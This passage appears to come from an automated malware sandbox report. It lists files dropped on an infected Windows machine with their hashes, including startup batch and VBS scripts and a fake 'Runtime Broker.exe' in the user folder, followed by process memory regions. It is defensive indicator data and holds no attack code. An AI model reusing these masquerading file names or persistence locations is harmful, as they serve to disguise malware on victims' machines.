                                            526e75f739ef9bd02ebb77893ccc70b2

                                            SHA1

                                            a181ec73db03cb823d0f68329cccdda357492513

                                            SHA256

                                            0d011987ec9e30b03d6a8cb8b03876090080d8222b2e0c235c8073cf744c3d99

                                            SHA512

                                            61854f69c5fe48e9ec8f76be06106d1f2ccc51c93d9bf7f2e4f1a665804b3f63fe2102505b596de5e491a4c088e428296ae51d034026a2ac9f0d841a6119d077

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

                                            Filesize

                                            194B

                                            MD5

                                            91d3addd55d196164f446a2e0a2c4670

                                            SHA1

                                            beb6cfdb45549b3faad37124afbc6735d28cdbdb

                                            SHA256

                                            24a16e796ae6c6e0c7b3e84c9adbec8dabb2f087f6a03ca9ae6a366e4d329208

                                            SHA512

                                            6b7aad8e0a55e7ec0255cc92c1ab3f17d96ad4985caa29b3139bd95a3d2193632f19ce3e98322a428ffc483bc2eed388b1631dd64ac7270c921bb2366742c8fa

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt~RFe588c8b.TMP

                                            Filesize

                                            131B

                                            MD5

                                            9d00f7b3ecd92ae45fe8d0288166971e

                                            SHA1

                                            eace5e94d7ccf65a1c3b8e140152c632d6b2a38a

                                            SHA256

                                            c0e78796b6432e42758e08ceeafd249cd1906b562290b9f5f67db11c8829ccd3

                                            SHA512

                                            3664635f2133bb739b4650590b90b62519168388f56aa0d123f60cd1405b6a10d9273dd93afc6beb0e93ef1f1c7043eb0aa184753b40b0a30cf0e3e2419f919f

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

                                            Filesize

                                            16B

                                            MD5

                                            46295cac801e5d4857d09837238a6394

                                            SHA1

                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                            SHA256

                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                            SHA512

                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                            Filesize

                                            264B

                                            MD5

                                            aa3230e0626c4f66ed7a3e58a7dcc97b

                                            SHA1

                                            d3684911f3f82c59e90b8674b9a2dddb2280acbf

                                            SHA256

                                            3eaea5faa8f318c8febc396aee0e3bf5ac67bd46ab29e7f01e6c1b5aaf0c6b88

                                            SHA512

                                            64fc196f4dff1ff3c1bcc01d36d23acfce8c4605596b674039ad34ddc388b5761468e65bc36c6498ed88633a76bf63f25a12a091a39ad3569788c39fd210033f

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58da7d.TMP

                                            Filesize

                                            48B

                                            MD5

                                            7c826602c5a34419f177adf7c03c7238

                                            SHA1

                                            ebd86c44e06015edfa1aa1ec5f9aa3e87f59f821

                                            SHA256

                                            3c79b65e66015d778678f564460997a3a7cdefc5e05f85ad98f7564f845cc448

                                            SHA512

                                            c301b96b0ea3ec35197d0d8243e67261f760b49fffa60e288a41c4bc30d7ff3105dfd1d87e34917e619ba6440c7747ef4565f65d2a4f89dea0bd62e32cb68972

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d9946227-28f5-4bd2-8d4f-712d5cfca0de.tmp

                                            Filesize

                                            7KB

                                            MD5

                                            d810b949d7aa3b10541f274e42a683b6

                                            SHA1

                                            d161d05ac39e238d8b2d94b2a856d07cc3e132b2

                                            SHA256

                                            0f4dcfcd01ae4d5c6ec037a78abc526e15cd602e08c63aa21b9c8ce80b6ade2b

                                            SHA512

                                            cec958076c9864274efe2cc68755d2dc5a7ef094acf9b6e8c2c69981d26bd3fd8f1e0c67719bc8b5f1a2553899149ed6e1c4633951b21ae6f12fe7f97f2fbd14

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            261KB

                                            MD5

                                            865a551095e53d195927e9cc1689ad40

                                            SHA1

                                            f20c7a70ba70119101d013b816b30c2e525242de

                                            SHA256

                                            8c1a9e10d82384e3cba34cdc4941ec38ad10fa7cde11def71190415e8bf89b18

                                            SHA512

                                            5048b482ec7d939466d83c8f7ca0225edf860ade55a2deb2793f351c0ff084ae251dc78cea843c1667bd6398638bf74953f5226a338503b244c997128e89b901

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            261KB

                                            MD5

                                            cd8205c7ca6020c90ddccf3ad2a9442d

                                            SHA1

                                            0b041d6cdb2da7e01cb72b46cb3e91119baaf8e7

                                            SHA256

                                            5d1b7c2b57411b1e746c978c2e12e7f16bf98c3f4d4ebb9aa2f3ef3c4be3319e

                                            SHA512

                                            6f40f5541529193c0fee89107b55ff69d31379d8a595fc396808d26449ff13a3ad63cdb3d493cb2bd377d21e676922bc8485f05eaaef719388fba9c9b09fd518

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            85KB

                                            MD5

                                            027ac85656f3df3a280311f4dcd4d69c

                                            SHA1

                                            a2f0b99fdfc2f3d263769a7f38f18e84678a795c

                                            SHA256

                                            69292bdf5844176ce1ccb8f4be4733b04ac2600b8bf244b1ec843b3765e3dcac

                                            SHA512

                                            c17fb10b5798e1113912803d429cad90e5691b75cd5fd408eec0b682c0fe8df1e8763c0db17e848659152cef5c7631ff3f19f03ac5c6207d0eaf53d1439e7eeb

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            88KB

                                            MD5

                                            18abbb34345326f8fde4918d0535d731

                                            SHA1

                                            70e0490eff7f87b71baed444f8283989126f16e6

                                            SHA256

                                            0b3b5f425f58ce1416958f53a9314c4da978ab26017b1d32c9686d08bfcf256a

                                            SHA512

                                            eb56a349ffb0c3c699d2c7a9a3932a36e3135f5f986dbb6ac43917e96e60825f4a1583e3047b91816506f222fd1a0b76b50f8900a5face9af47552be835e3d47

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58919c.TMP

                                            Filesize

                                            83KB

                                            MD5

                                            3a453cb951a76d09d8c47c1d9f04fb46

                                            SHA1

                                            e47e45461466e708a7be8b9b5a9119171d8fe86a

                                            SHA256

                                            20f479fbd846a0ef94f7f5dea01d6636745edde6cc17321643bdcaae355fccfd

                                            SHA512

                                            72d96b1c4524bfa2f9f9b66c8aa45c7d599b09361ad37d18b8ad80951ed0c80c89bd121a3e27536efd36ae2cceaa4fb95952a2cf0aecfdbf9a23699f48f5735c

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broker.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            627073ee3ca9676911bee35548eff2b8

                                            SHA1

                                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                            SHA256

                                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                            SHA512

                                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            3KB

                                            MD5

                                            df472dcddb36aa24247f8c8d8a517bd7

                                            SHA1

                                            6f54967355e507294cbc86662a6fbeedac9d7030

                                            SHA256

                                            e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                            SHA512

                                            06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            1KB

                                            MD5

                                            82fa4a888cbdfa7fee6c937009faa09d

                                            SHA1

                                            ccd30a243634b505642e89c60c128acad5cf8ba9

                                            SHA256

                                            71eca5c0a2738ec9154045e1b2be6ac19a41f9bcc341a2e3d613f74a2212ea55

                                            SHA512

                                            971f6009d1cf3ac33d44cc6521cc490aca9643865ce97517290e52b8dacb14ba615590b57f4ef10ab1659a3897558c5f088e7d5d366c4f0c0e10828c73be214e

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            eb15ee5741b379245ca8549cb0d4ecf8

                                            SHA1

                                            3555273945abda3402674aea7a4bff65eb71a783

                                            SHA256

                                            b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

                                            SHA512

                                            1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                            SHA1

                                            9910190edfaccece1dfcc1d92e357772f5dae8f7

                                            SHA256

                                            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                            SHA512

                                            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            80707036df540b6657f9d443b449e3c3

                                            SHA1

                                            b3e7d5d97274942164bf93c8c4b8a9b68713f46f

                                            SHA256

                                            6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0

                                            SHA512

                                            65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            e47c3fa11e796c492a8388c946bf1636

                                            SHA1

                                            4a090378f0db26c6f019c9203f5b27f12fa865c7

                                            SHA256

                                            4bb861850395dcc3bec4691e8b9f0fa733b8a2d568d460a9201d65250b12fee1

                                            SHA512

                                            8d4af4eba3019cd060561f42cff11374eafe59da5e5ad677e41d0b9198b87d6d13706e760d13c70574ed1384993a1597f886d21fe6ecd0186379a1e93db30695

                                          • C:\Users\Admin\AppData\Local\Temp\Log.tmp

                                            Filesize

                                            224B

                                            MD5

                                            9ec9007da004d61ca9778a8498af2f7b

                                            SHA1

                                            add118014c9275a88b0717f370c71f500a94a223

                                            SHA256

                                            76bed517c101343aa7dfb6b3661c8794cc07140e71f5724def0b9ec61db69383

                                            SHA512

                                            0be7976ba8a0a43335aea53e5657fd4987f21b5a33af4851afabfdb7d1a90f8daed37137b021a5bfe7f6c8f5871e38b51cb855320092a3e992e4f8dca7385db1

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm0qjyeq.r1q.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\AppData\Roaming\startup_str_837.bat

                                            Filesize

                                            302KB

                                            MD5

                                            7a5f5944302b8298714b56ae2f138b7c

                                            SHA1

                                            669b42f2f6e76895899d84d5ad7a12f23d951f13

                                            SHA256

                                            3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

                                            SHA512

                                            73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

                                          • C:\Users\Admin\AppData\Roaming\startup_str_837.vbs

                                            Filesize

                                            115B

                                            MD5

                                            a299d6b6ae224adfb40548bab06b7ff9

                                            SHA1

                                            74221fa5196465f9b258dcd4ddb39399c408cb20

                                            SHA256

                                            a4fe79eb3bf7afd34cb8d435306f15a9be15029e1616fba7443d4478607c37d6

                                            SHA512

                                            83de95510fbb89c4b2f29050c8bfd88dfd3283440c371818da8a9d1e82a8a0cf1e2ea86f38bc4a3b18fc6ee491b85d7cbd6584a08c143efed148c5afdc06bd42

                                          • C:\Users\Admin\Runtime Broker.exe

                                            Filesize

                                            440KB

                                            MD5

                                            0e9ccd796e251916133392539572a374

                                            SHA1

                                            eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                            SHA256

                                            c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                            SHA512

                                            e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                          • \??\pipe\crashpad_2152_VYJBYMLHQEQSYWOW

                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • memory/536-92-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-14-0x0000019CBD3F0000-0x0000019CBD42A000-memory.dmp

                                            Filesize

                                            232KB

                                          • memory/536-93-0x00007FFF13893000-0x00007FFF13895000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/536-10-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-0-0x00007FFF13893000-0x00007FFF13895000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/536-1-0x0000019CBD140000-0x0000019CBD162000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/536-11-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-12-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-13-0x0000019CBD3E0000-0x0000019CBD3E8000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1716-156-0x00000297D7CA0000-0x00000297D7CE6000-memory.dmp

                                            Filesize

                                            280KB

                                          • memory/3760-48-0x0000020C7C1F0000-0x0000020C7C20A000-memory.dmp

                                            Filesize

                                            104KB

                                          • memory/3760-663-0x0000020C7CB70000-0x0000020C7CBFE000-memory.dmp

                                            Filesize

                                            568KB

                                          • memory/3760-94-0x0000020C7C8C0000-0x0000020C7C8CC000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/4940-16-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-25-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-26-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-27-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-30-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB